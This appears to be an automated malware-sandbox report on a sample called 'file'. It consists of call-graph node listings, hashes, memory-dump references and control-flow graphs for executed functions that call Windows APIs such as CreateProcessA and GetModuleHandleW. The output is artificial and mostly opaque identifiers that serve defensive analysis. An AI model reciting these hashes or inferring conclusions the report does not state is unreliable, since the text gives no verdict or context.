c2fe4f2 77695->77686 77697 c2fb3a3 77696->77697 77698 c2f3020 KiUserCallbackDispatcher 77697->77698 77699 c2fd5fe 77698->77699 77699->77686 77700->77686 77703 c2fcc03 77701->77703 77702 c2fe57e 77702->77695 77703->77702 77704 c2fcc48 KiUserCallbackDispatcher 77703->77704 77704->77702 77705 c2fc7f0 77706 c2fc829 77705->77706 77707 c2fc8c7 77706->77707 77721 2ecf768 2 API calls 77706->77721 77716 c2fc93d 77707->77716 77724 75924a8 77707->77724 77732 7590348 77707->77732 77708 c2fca7f 77710 c2fcab0 77708->77710 77719 2ecdcf4 2 API calls 77708->77719 77756 2ecf032 77708->77756 77709 c2fc945 77709->77708 77748 c2f50a1 77709->77748 77752 c2f50b0 77709->77752 77760 75923c8 77710->77760 77764 75923d8 77710->77764 77711 c2fcac4 77740 7590358 77716->77740 77744 75923ef 77716->77744 77719->77710 77721->77707 77725 75924b2 77724->77725 77727 7592546 77725->77727 77768 c2fdac0 77725->77768 77773 c2fdab1 77725->77773 77726 75925e7 77728 c2fdab1 2 API calls 77726->77728 77729 c2fdac0 2 API calls 77726->77729 77727->77716 77728->77727 77729->77727 77733 7590353 77732->77733 77735 7592546 77733->77735 77738 c2fdab1 2 API calls 77733->77738 77739 c2fdac0 2 API calls 77733->77739 77734 75925e7 77736 c2fdab1 2 API calls 77734->77736 77737 c2fdac0 2 API calls 77734->77737 77735->77716 77736->77735 77737->77735 77738->77734 77739->77734 77742 7590363 77740->77742 77741 7592430 77741->77709 77742->77741 77743 759241c KiUserCallbackDispatcher 77742->77743 77743->77741 77745 7592411 77744->77745 77746 7592430 77745->77746 77747 759241c KiUserCallbackDispatcher 77745->77747 77746->77709 77747->77746 77750 c2f50c3 77748->77750 77749 c2f50c7 77749->77708 77750->77749 77751 c2f511a KiUserCallbackDispatcher 77750->77751 77751->77749 77754 c2f50c3 77752->77754 77753 c2f50c7 77753->77708 77754->77753 77755 c2f511a KiUserCallbackDispatcher 77754->77755 77755->77753 77758 2ecf040 77756->77758 77757 2ecf0d5 77757->77710 77758->77757 77759 2eccac4 2 API calls 77758->77759 77759->77757 77761 75923e5 77760->77761 77762 7590358 KiUserCallbackDispatcher 77761->77762 77763 75923ec 77762->77763 77763->77711 77765 75923e5 77764->77765 77766 7590358 KiUserCallbackDispatcher 77765->77766 77767 75923ec 77766->77767 77767->77711 77769 c2fdad0 77768->77769 77771 c2fdaf8 PostMessageW 77769->77771 77772 c2fdaf1 PostMessageW 77769->77772 77770 c2fdae1 77770->77726 77771->77770 77772->77770 77774 c2fdad0 77773->77774 77776 c2fdaf8 PostMessageW 77774->77776 77777 c2fdaf1 PostMessageW 77774->77777 77775 c2fdae1 77775->77726 77776->77775 77777->77775 77603 2ecf74d 77604 2ecf758 77603->77604 77605 767fe48 2 API calls 77603->77605 77605->77604 77778 767f380 77779 767f3a3 77778->77779 77781 c2f3018 KiUserCallbackDispatcher 77779->77781 77782 c2f3020 KiUserCallbackDispatcher 77779->77782 77780 767f3ac 77781->77780 77782->77780 77783 c2f77c1 77787 778ee10 77783->77787 77793 778ee00 77783->77793 77784 c2f77d5 77789 778ee23 77787->77789 77788 778ee40 77788->77784 77789->77788 77799 778eeea 77789->77799 77805 778eef8 77789->77805 77790 778ee64 77790->77784 77795 778ee23 77793->77795 77794 778ee40 77794->77784 77795->77794 77797 778eef8 2 API calls 77795->77797 77798 778eeea 2 API calls 77795->77798 77796 778ee64 77796->77784 77797->77796 77798->77796 77800 778ef06 77799->77800 77801 778ef4e 77800->77801 77811 c2f30b0 77800->77811 77815 c2f30e0 77800->77815 77801->77790 77802 778ef49 77802->77790 77806 778ef06 77805->77806 77807 778ef4e 77806->77807 77809 c2f30b0 SetWindowTextW 77806->77809 77810 c2f30e0 SetWindowTextW 77806->77810 77807->77790 77808 778ef49 77808->77790 77809->77808 77810->77808 77812 c2f30e0 SetWindowTextW 77811->77812 77814 c2f3159 77812->77814 77814->77802 77816 c2f3128 SetWindowTextW 77815->77816 77817 c2f3122 77815->77817 77818 c2f3159 77816->77818 77817->77816 77818->77802 77281 c2f1f00 77285 c2f1f20 77281->77285 77291 c2f1f30 77281->77291 77282 c2f1f1f 77286 c2f1f30 77285->77286 77287 c2f1f52 77286->77287 77296 2ec83ff 77286->77296 77302 2ec8430 77286->77302 77307 2ec5c7c 77286->77307 77287->77282 77292 c2f1f52 77291->77292 77293 2ec5c7c 4 API calls 77291->77293 77294 2ec83ff 4 API calls 77291->77294 77295 2ec8430 4 API calls 77291->77295 77292->77282 77293->77292 77294->77292 77295->77292 77297 2ec841b 77296->77297 77299 2ec845e 77296->77299 77297->77287 77298 2ec8731 77298->77287 77299->77298 77312 2ecce81 77299->77312 77318 2ecce90 77299->77318 77303 2ec83ba 77302->77303 77303->77302 77304 2ec8731 77303->77304 77305 2ecce90 4 API calls 77303->77305 77306 2ecce81 4 API calls 77303->77306 77304->77287 77305->77304 77306->77304 77309 2ec5c87 77307->77309 77308 2ec8731 77308->77287 77309->77308 77310 2ecce90 4 API calls 77309->77310 77311 2ecce81 4 API calls 77309->77311 77310->77308 77311->77308 77313 2ecceb1 77312->77313 77314 2ecced5 77313->77314 77324 2ecd099 77313->77324 77329 2ecd040 77313->77329 77333 2ecd030 77313->77333 77314->77298 77319 2ecceb1 77318->77319 77320 2ecced5 77319->77320 77321 2ecd099 4 API calls 77319->77321 77322 2ecd040 4 API calls 77319->77322 77323 2ecd030 4 API calls 77319->77323 77320->77298 77321->77320 77322->77320 77323->77320 77325 2ecd03a 77324->77325 77326 2ecd0a2 77324->77326 77327 2ecd087 77325->77327 77337 2ecc978 77325->77337 77326->77314 77327->77314 77332 2ecd03a 77329->77332 77330 2ecd087 77330->77314 77331 2ecc978 4 API calls 77331->77330 77332->77329 77332->77330 77332->77331 77334 2ecd03a 77333->77334 77335 2ecc978 4 API calls 77334->77335 77336 2ecd087 77334->77336 77335->77336 77336->77314 77338 2ecc983 77337->77338 77340 2ecd9cf 77338->77340 77341 2eccaa4 77338->77341 77340->77327 77342 2eccaaf 77341->77342 77343 2ec5c7c 4 API calls 77342->77343 77344 2ecda07 77343->77344 77350 2ecda16 77344->77350 77351 2ecde88 3 API calls 77344->77351 77352 2ecde78 3 API calls 77344->77352 77346 2ecda30 77347 2eccac4 2 API calls 77346->77347 77348 2ecda37 77347->77348 77349 2ecda41 77348->77349 77353 2ecf768 2 API calls 77348->77353 77349->77338 77354 2eccab4 77350->77354 77351->77350 77352->77350 77353->77349 77357 2eccabf 77354->77357 77356 2ecefa4 77356->77346 77358 2ecefa9 77357->77358 77359 2ecdcf4 77357->77359 77358->77346 77360 2ecdcff 77359->77360 77361 2eccac4 2 API calls 77360->77361 77362 2ecf0d5 77360->77362 77361->77362 77362->77356 77378 c2f0040 77379 c2f0078 77378->77379 77386 c2f16c0 77379->77386 77391 c2f1690 77379->77391 77380 c2f0173 77397 c2f1c00 77380->77397 77401 c2f1bff 77380->77401 77381 c2f0197 77388 2ec5c7c 4 API calls 77386->77388 77389 2ec83ff 4 API calls 77386->77389 77390 2ec8430 4 API calls 77386->77390 77387 c2f16d3 77387->77380 77388->77387 77389->77387 77390->77387 77392 c2f169f 77391->77392 77392->77380 77394 2ec5c7c 4 API calls 77392->77394 77395 2ec83ff 4 API calls 77392->77395 77396 2ec8430 4 API calls 77392->77396 77393 c2f16d3 77393->77380 77394->77393 77395->77393 77396->77393 77406 c2f1c30 77397->77406 77412 c2f1c40 77397->77412 77398 c2f1c1f 77398->77381 77402 c2f1c00 77401->77402 77404 c2f1c30 4 API calls 77402->77404 77405 c2f1c40 4 API calls 77402->77405 77403 c2f1c1f 77403->77381 77404->77403 77405->77403 77407 c2f1c6e 77406->77407 77409 2ec5c7c 4 API calls 77407->77409 77410 2ec83ff 4 API calls 77407->77410 77411 2ec8430 4 API calls 77407->77411 77408 c2f1ca4 77408->77398 77409->77408 77410->77408 77411->77408 77413 c2f1c6e 77412->77413 77415 2ec5c7c 4 API calls 77413->77415 77416 2ec83ff 4 API calls 77413->77416 77417 2ec8430 4 API calls 77413->77417 77414 c2f1ca4 77414->77398 77415->77414 77416->77414 77417->77414 77819 c2f31c0 77820 c2f3205 GetClassInfoW 77819->77820 77822 c2f324b 77820->77822 77823 7782c88 77826 7782c9f 77823->77826 77825 7782cfe 77827 7780b08 77826->77827 77828 7780b13 77827->77828 77829 77835b8 4 API calls 77828->77829 77830 7785559 77828->77830 77829->77830 77830->77825 77363 2ecadd8 77364 2ecade7 77363->77364 77366 2ecaed0 77363->77366 77367 2ecaee1 77366->77367 77368 2ecaf04 77366->77368 77367->77368 77369 2ecaefc 77367->77369 77373 2ecb159 77367->77373 77368->77364 77369->77368 77370 2ecb108 GetModuleHandleW 77369->77370 77371 2ecb135 77370->77371 77371->77364 77374 2ecb102 GetModuleHandleW 77373->77374 77377 2ecb162 77373->77377 77376 2ecb135 77374->77376 77376->77369 77377->77369 77606 2ecd158 77607 2ecd19e 77606->77607 77611 2ecd328 77607->77611 77614 2ecd338 77607->77614 77608 2ecd28b 77617 2ecca40 77611->77617 77615 2ecd366 77614->77615 77616 2ecca40 DuplicateHandle 77614->77616 77615->77608 77616->77615 77618 2ecd3a0 DuplicateHandle 77617->77618 77619 2ecd366 77618->77619 77619->77608 77620 ba6b510 77621 ba6b536 77620->77621 77622 ba6b69b 77620->77622 77621->77622 77625 c2fdaf8 PostMessageW 77621->77625 77627 c2fdaf1 PostMessageW 77621->77627 77626 c2fdb64 77625->77626 77626->77621 77628 c2fdb64 77627->77628 77628->77621 77831 c2f37d8 77832 c2f37ff 77831->77832 77833 c2f3904 77832->77833 77834 c2f3860 77832->77834 77838 2eccac4 2 API calls 77832->77838 77839 2ecf578 77832->77839 77834->77833 77842 b9b0cd0 77834->77842 77846 b9b0cbf 77834->77846 77838->77834 77840 2ecdde8 2 API calls 77839->77840 77841 2ecf5af 77839->77841 77840->77841 77841->77834 77843 b9b0cfa 77842->77843 77850 75917df 77843->77850 77844 b9b0d1c 77844->77833 77847 b9b0cd0 77846->77847 77849 75917df 2 API calls 77847->77849 77848 b9b0d1c 77848->77833 77849->77848 77851 75917ea 77850->77851 77853 759183d 77850->77853 77852 7591834 77851->77852 77856 2eceb10 77851->77856 77860 2eceaff 77851->77860 77852->77844 77853->77844 77857 2eceb2d 77856->77857 77858 2eccac4 2 API calls 77857->77858 77859 2eceb71 77857->77859 77858->77859 77859->77852 77861 2eceb2d 77860->77861 77862 2eccac4 2 API calls 77861->77862 77863 2eceb71 77861->77863 77862->77863 77863->77852 77864 c2f70d8 77865 c2f70dd 77864->77865 77868 c2fcf56 77865->77868 77867 c2f70f0 77869 c2fcf58 77868->77869 77873 c2fcf77 77868->77873 77870 c2fd1da 77869->77870 77872 c2fcf61 77869->77872 77884 c2fb448 77870->77884 77872->77873 77875 c2fd209 77872->77875 77876 c2fd1e8 77872->77876 77877 c2fd227 77872->77877 77879 c2fd09d 77872->77879 77883 c2fd056 77872->77883 77874 c2f3020 KiUserCallbackDispatcher 77873->77874 77873->77879 77874->77879 77881 c2f3020 KiUserCallbackDispatcher 77875->77881 77880 c2f3020 KiUserCallbackDispatcher 77876->77880 77878 c2f3020 KiUserCallbackDispatcher 77877->77878 77878->77879 77879->77867 77880->77879 77881->77879 77882 c2f3020 KiUserCallbackDispatcher 77882->77879 77883->77882 77885 c2fb453 77884->77885 77886 c2f3020 KiUserCallbackDispatcher 77885->77886 77887 c2ffd39 77886->77887 77887->77873 77418 7789c00 77421 7789c2d 77418->77421 77419 7789c7c 77419->77419 77421->77419 77422 77889dc 77421->77422 77423 77889e7 77422->77423 77424 7788980 SetTimer 77423->77424 77425 7789de5 77424->77425 77425->77419

                                            Executed Functions

                                            Function 0C2F3C18 Relevance: 1.7, Strings: 1, Instructions: 421COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1418454640.000000000C2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C2F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_c2f0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: d1a0653ab4e8f25fa63de91b392e48e8844c215185900a80fee216b8364026be
                                            • Instruction ID: c8b38842653688df25f73dd726c1baaeccfb5d97c5a204a4d8366de2d98b4a93
                                            • Opcode Fuzzy Hash: d1a0653ab4e8f25fa63de91b392e48e8844c215185900a80fee216b8364026be
                                            • Instruction Fuzzy Hash: 52021E34E11219CBDB14EB64C854BDDF7B2BF99300F1086A9E50AA7650DF709A8ACF60
                                            Function 07781348 Relevance: .9, Instructions: 905COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1415308141.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7780000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 72b7f47791fbcc53a7ee97810a79f3319af8738831050dd56ba4245a750e2c63
                                            • Instruction ID: 2654b16d2c9351875d5d1aba79724b0dc64d580d3ab2ca95d471e0b92cd00c59
                                            • Opcode Fuzzy Hash: 72b7f47791fbcc53a7ee97810a79f3319af8738831050dd56ba4245a750e2c63
                                            • Instruction Fuzzy Hash: B7724CB0E0021DCFCB50EFA8C884AADBBB2FF45350F558599D44AAB255DB30AD92CF51
                                            Function 075903C8 Relevance: .7, Instructions: 651COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1414884334.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7590000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ca35eac9d0f6a2a1afc50d3a61439460801e22784e0855acf361af175f78dd0e
                                            • Instruction ID: 749f66e708c2e24a7e68ad3826b299f596575527f33df1ea8d651e09881cad4e
                                            • Opcode Fuzzy Hash: ca35eac9d0f6a2a1afc50d3a61439460801e22784e0855acf361af175f78dd0e
                                            • Instruction Fuzzy Hash: B2426A70E002199FEB64DFA8C89079EBBF2BF88310F14856AD409AB395DF709D45CB91
                                            Function 0B9BD8B0 Relevance: .6, Instructions: 635COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1416749754.000000000B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B9B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b9b0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 38e264d4159c314cb6da8a37fa90ee6930b7530a586b4cff9da291fdc07d7c33
                                            • Instruction ID: fa9b538522c4b48ee5cec9d0305f772405e136c91796a2cf81bb28f843189831
                                            • Opcode Fuzzy Hash: 38e264d4159c314cb6da8a37fa90ee6930b7530a586b4cff9da291fdc07d7c33
                                            • Instruction Fuzzy Hash: 9E523D35A10619CFCB21DF64C944BE9BBB5FF89304F1485E9E509AB261EB31EA81CF41
                                            Function 0C2FA6E8 Relevance: .6, Instructions: 553COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1418454640.000000000C2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C2F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_c2f0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c45fac9c3694c94fe3487ab7a235d9c07a4de832300591343a9ed301fb3101ac
                                            • Instruction ID: 5a3b589f97405b0813c77fb90e959d262c333bc51c44d270c524af7aba4ab937
                                            • Opcode Fuzzy Hash: c45fac9c3694c94fe3487ab7a235d9c07a4de832300591343a9ed301fb3101ac
                                            • Instruction Fuzzy Hash: 86227B30B10209CFDB24EBB9C5547AEBBF2AF88310F248179E509AB791DE309D46DB51
                                            Function 0C2F0040 Relevance: .6, Instructions: 551COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1418454640.000000000C2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C2F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_c2f0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5af71cce3eafd7bb24787f372c3214819f63a4d0c7c74e9e9165073705300ee7
                                            • Instruction ID: 777de271a636c0aedcad0eb9ddbd2ce11f95c198ac8bd680e761394f3f30506c
                                            • Opcode Fuzzy Hash: 5af71cce3eafd7bb24787f372c3214819f63a4d0c7c74e9e9165073705300ee7
                                            • Instruction Fuzzy Hash: 96323B74B002288FEB58DB28C854BDEB7F2AF88740F1481A8D50AAB755DF349D46CF95
                                            Function 0C2F0D46 Relevance: .5, Instructions: 533COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1418454640.000000000C2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C2F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_c2f0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2bad437eda2108c2b479115a6528ba87a0e67fceb083152deff162dc914df6f6
                                            • Instruction ID: 62573f6ac26aa0fe363429b843149775536c9a2f27add1179d7a5950df7a795b
                                            • Opcode Fuzzy Hash: 2bad437eda2108c2b479115a6528ba87a0e67fceb083152deff162dc914df6f6
                                            • Instruction Fuzzy Hash: 8442E574A00218CFDB18DF28C999AE9B7F2FF89700F1581E9D509AB361DA31AD85CF51
                                            Function 0BA60040 Relevance: .5, Instructions: 514COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1416947425.000000000BA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ba60000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fc73574c88009c0d99d68b6d62ead1776a3cdc64869768317961c1db8851f2d0
                                            • Instruction ID: 3f0786dc6141bdae0d4177d1b2a019f99ea3f8fd27a6f51a91bc8872f2ea02bf
                                            • Opcode Fuzzy Hash: fc73574c88009c0d99d68b6d62ead1776a3cdc64869768317961c1db8851f2d0
                                            • Instruction Fuzzy Hash: 83323771910619CFDB21DF64C984BDAB7B2FF89304F1085E9E509AB261EB71AAC5CF40
                                            Function 07780C30 Relevance: .5, Instructions: 484COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1415308141.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7780000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 222fb4fd49a24758d98c68ae7ee6083ec82f62ddabe293c850b9183622422dd9
                                            • Instruction ID: 0b5b81a28bbf1ec625dec98a2443678e8cdfc43e2c49fc614355caba17dc853b
                                            • Opcode Fuzzy Hash: 222fb4fd49a24758d98c68ae7ee6083ec82f62ddabe293c850b9183622422dd9
                                            • Instruction Fuzzy Hash: 73223870A10219CFDB64DF68C884B9DB7B2FF89314F518599E409AB261DB30EE85CF91
                                            Function 0BA676D0 Relevance: .4, Instructions: 422COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1416947425.000000000BA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ba60000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2ea6d490bb00b0fb812d8dbf8a2a0a420f8914e82fa8465bf9b270f43c170965
                                            • Instruction ID: cd54dbd5e6bf141d805b10b35828839738fdda1b9d07609dab2dae0bf0f14164
                                            • Opcode Fuzzy Hash: 2ea6d490bb00b0fb812d8dbf8a2a0a420f8914e82fa8465bf9b270f43c170965
                                            • Instruction Fuzzy Hash: 18E1A9B17006048FDB29EBB9C5607AEB7E7AF89644F24846DD54A8B390DE35DC02CB61
                                            Function 0B9B5840 Relevance: .4, Instructions: 396COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1416749754.000000000B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B9B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b9b0000_file.jbxd
                                            Similarity
                                            • API ID: DispatchMessage
                                            • String ID:
                                            • API String ID: 2061451462-0
                                            • Opcode ID: fe51f8c6ea408a3d597579c49e5d3b2dc8012244ce8f2085826b5eba8ac2da30
                                            • Instruction ID: d23a9ea3f36d1f485846d17417f477164602c26cd9f4f24ff7c5d35de9be0546
                                            • Opcode Fuzzy Hash: fe51f8c6ea408a3d597579c49e5d3b2dc8012244ce8f2085826b5eba8ac2da30
                                            • Instruction Fuzzy Hash: 26F14930A00209CFDB14DFA9C998B9DBBF2BF98714F168169E405AF265DB70A945CF90
                                            Function 0C2FA6DB Relevance: .3, Instructions: 316COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1418454640.000000000C2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C2F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_c2f0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4c5b0fb467edbeb7ed85dc2deccd72bc45054ce60f5c8b713ef1b8fc7e282e9c
                                            • Instruction ID: cd8ab101f4696bfbb6ba967e5b22d75d0f7e34b46c3adde92c3a111630f5ae75
                                            • Opcode Fuzzy Hash: 4c5b0fb467edbeb7ed85dc2deccd72bc45054ce60f5c8b713ef1b8fc7e282e9c
                                            • Instruction Fuzzy Hash: 5ED11971E10209CFDB25DFB5C954A9DBBF2BF89300F248269E509AB361DB709986DF10
                                            Function 07592728 Relevance: .3, Instructions: 280COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1414884334.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7590000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 211396d88d4ff58488e6535bfce405e0674a0f4467838026a1bcdff41596b2db
                                            • Instruction ID: 6e50e7c86df0ba4c89d5dfc7bd5741a26019847ff353995e62cbed920800bb7e
                                            • Opcode Fuzzy Hash: 211396d88d4ff58488e6535bfce405e0674a0f4467838026a1bcdff41596b2db
                                            • Instruction Fuzzy Hash: 84C16AB1E00219AFDF15CF68C8807DEBBB2BF89310F14C5AAD409AB255DB709985CF50
                                            Function 07676E98 Relevance: .1, Instructions: 61COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1415248979.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7670000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1d43f63d2d7a883f36e3a6401238acc22e065dfbee7b970813f9c2cbfcd6019c
                                            • Instruction ID: ef96dab2497dfd3740d589cebc89a91150f7be1386fdf8840371d0e012d5f985
                                            • Opcode Fuzzy Hash: 1d43f63d2d7a883f36e3a6401238acc22e065dfbee7b970813f9c2cbfcd6019c
                                            • Instruction Fuzzy Hash: 9021E2B0D046188BEB19CFA6D9543DEBBF6AFC9300F14C06AD409BA264DB790986CF50
                                            Function 07676EA8 Relevance: .1, Instructions: 57COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1415248979.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7670000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2f797c220461bc8dc7d2c00a18720253d7dddc8078d029f86666827f3d13b5e4
                                            • Instruction ID: 848a01358726a6cc212258aa4f17f6237e78caf12d8af9b410ae29f593b67779
                                            • Opcode Fuzzy Hash: 2f797c220461bc8dc7d2c00a18720253d7dddc8078d029f86666827f3d13b5e4
                                            • Instruction Fuzzy Hash: 33219EB1D046188BEB18CFABC9447DEFAF6AFC9304F14C06AD41966268DB7509868F90
                                            Function 0767D018 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 148 767d018-767d0ad 150 767d0e6-767d106 148->150 151 767d0af-767d0b9 148->151 156 767d13f-767d16e 150->156 157 767d108-767d112 150->157 151->150 152 767d0bb-767d0bd 151->152 153 767d0e0-767d0e3 152->153 154 767d0bf-767d0c9 152->154 153->150 158 767d0cd-767d0dc 154->158 159 767d0cb 154->159 167 767d1a7-767d261 CreateProcessA 156->167 168 767d170-767d17a 156->168 157->156 160 767d114-767d116 157->160 158->158 161 767d0de 158->161 159->158 162 767d139-767d13c 160->162 163 767d118-767d122 160->163 161->153 162->156 165 767d126-767d135 163->165 166 767d124 163->166 165->165 169 767d137 165->169 166->165 179 767d263-767d269 167->179 180 767d26a-767d2f0 167->180 168->167 170 767d17c-767d17e 168->170 169->162 172 767d1a1-767d1a4 170->172 173 767d180-767d18a 170->173 172->167 174 767d18e-767d19d 173->174 175 767d18c 173->175 174->174 177 767d19f 174->177 175->174 177->172 179->180 190 767d2f2-767d2f6 180->190 191 767d300-767d304 180->191 190->191 192 767d2f8 190->192 193 767d306-767d30a 191->193 194 767d314-767d318 191->194 192->191 193->194 195 767d30c 193->195 196 767d31a-767d31e 194->196 197 767d328-767d32c 194->197 195->194 196->197 198 767d320 196->198 199 767d33e-767d345 197->199 200 767d32e-767d334 197->200 198->197 201 767d347-767d356 199->201 202 767d35c 199->202 200->199 201->202
                                            APIs
                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0767D24E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1415248979.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7670000_file.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: b606ef1610bd8411874ec3e5f9797d69061f6c1bf636d41f54664dccbe489f84
                                            • Instruction ID: 305c923980d62cd8d6d34ed4ded514b53425c1102e045e7f2c073c033523155e
                                            • Opcode Fuzzy Hash: b606ef1610bd8411874ec3e5f9797d69061f6c1bf636d41f54664dccbe489f84
                                            • Instruction Fuzzy Hash: A3916CB1E00319DFEB24DF68C840BDEBBB2BF48354F1485A9E819A7240DB759985CF91
                                            Function 02ECAED0 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 204 2ecaed0-2ecaedf 205 2ecaf0b-2ecaf0f 204->205 206 2ecaee1-2ecaeee call 2ec98d8 204->206 208 2ecaf11-2ecaf1b 205->208 209 2ecaf23-2ecaf64 205->209 212 2ecaf04 206->212 213 2ecaef0 206->213 208->209 215 2ecaf66-2ecaf6e 209->215 216 2ecaf71-2ecaf7f 209->216 212->205 259 2ecaef6 call 2ecb168 213->259 260 2ecaef6 call 2ecb159 213->260 215->216 217 2ecaf81-2ecaf86 216->217 218 2ecafa3-2ecafa5 216->218 220 2ecaf88-2ecaf8f call 2eca8b4 217->220 221 2ecaf91 217->221 223 2ecafa8-2ecafaf 218->223 219 2ecaefc-2ecaefe 219->212 222 2ecb040-2ecb100 219->222 225 2ecaf93-2ecafa1 220->225 221->225 254 2ecb108-2ecb133 GetModuleHandleW 222->254 255 2ecb102-2ecb105 222->255 226 2ecafbc-2ecafc3 223->226 227 2ecafb1-2ecafb9 223->227 225->223 230 2ecafc5-2ecafcd 226->230 231 2ecafd0-2ecafd9 call 2eca8c4 226->231 227->226 230->231 235 2ecafdb-2ecafe3 231->235 236 2ecafe6-2ecafeb 231->236 235->236 237 2ecafed-2ecaff4 236->237 238 2ecb009-2ecb016 236->238 237->238 240 2ecaff6-2ecb006 call 2eca8d4 call 2eca8e4 237->240 245 2ecb018-2ecb036 238->245 246 2ecb039-2ecb03f 238->246 240->238 245->246 256 2ecb13c-2ecb150 254->256 257 2ecb135-2ecb13b 254->257 255->254 257->256 259->219 260->219
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 02ECB126
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1408871050.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2ec0000_file.jbxd
                                            Similarity
                                            • API ID: HandleModule
